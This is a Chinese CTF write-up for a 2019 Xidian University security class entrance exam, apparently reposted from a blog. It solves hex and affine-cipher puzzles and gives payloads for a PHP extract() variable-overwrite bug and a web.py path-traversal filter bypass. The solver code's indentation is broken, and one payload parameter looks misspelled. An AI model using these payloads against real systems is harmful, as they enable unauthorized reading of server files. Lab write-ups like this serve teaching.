2019西电网安实验班选拔考试

1.FirstBlood

class="reveal-modal" style="display: none;">

我的信息


队伍名称:测试用户


口号:FirstBl00d



分数: 300


已找到的FLAG: 3



class="close-reveal-modal">×

访问url/index.php/user/updatevoice?voice=FirstBlood

2.十六进制字符串

打开题目,提示:

这是一个十六进制的字符串,解开后就知道flag在哪里了 666c61675f69735f686572657b3265346231303234613763386 3353432373139633637613064666333663432302e7068707d
直接将上面的数字扔进hex转换器转成字符
 
3.仿射密码
密文:yfsfnhtzlsrftclhwrffonw
在该仿射中,a=15,b=23
将得到的明文提交:
仿射密码规则为:c = (m * a + b) % 26
要得到明文 则为:m = (c - b *a^(-1)) % 26
算法:
#coding=utf-8 
#求最大公约数 
def egcd(a, b): 
if a == 0: 
return (b, 0, 1)
 else:
g, y, x = egcd(b % a, a)
 return (g, x - (b // a) * y, y)
 #求模逆元素 
def modinv(a, m): 
g, x, y = egcd(a, m) 
if g != 1: 
raise Exception('modular inverse does not exist') 
else:
return x % m
 #欧拉函数 
def eular(n): 
count = 0 
for x in xrange(0,n): 
g,x,y = egcd(x,n) 
if g == 1:
 count = count + 1 
return count 
# 仿射密码 
def Affine_cipher(ciphertext,a,b): 
plantext = ''
 # 求逆元
 fa = modinv(a,26) for x in ciphertext: 
if x == ' ': 
plantext += ' '
 continue plantext += chr(ord('a')+((ord(x)-b)-ord('a'))*fa%26) 
return plantext

调用key得出明文

4.变量覆盖

php
$filename = 'x';
extract($_GET);
if(!empty($attempt))
{
    $conbination = trim(file_get_contents($filename));
    if ($attempt === $conbination)
    {
        echo "

neirong" . "$conbination!?

"; require("flag.php"); echo "

congratulation,key is:" . "$flag

"; } else { echo "

Incorrenr!

"; } } ?>

 

payload:url?attempy=&filename=flag.php

 

5.web.py

def GET(self,filepath):
    if filepath.find("flag")>-1:
        return "Hacker"
    filepath = filepath.replace("../","")
    try:
        with open("./uploads/%s" % filepath,"rb") as f:
            content = f.read()
        return content
    except:
        return web.notfound("Sorry,the file you were looking for was not found.")

 

exp:

from requests import get

def get_flag():
    url = ""
    payload = url + ".../...//.../...//fla../g.txt"
    flag = get(payload).content
    return flag

if __name__ == "__main__":
    flag = get_flag()
    
    print "[x] flag :" +flag

 

 

转载于:https://www.cnblogs.com/sylover/p/11299295.html

你可能感兴趣的:(2019西电网安实验班选拔考试)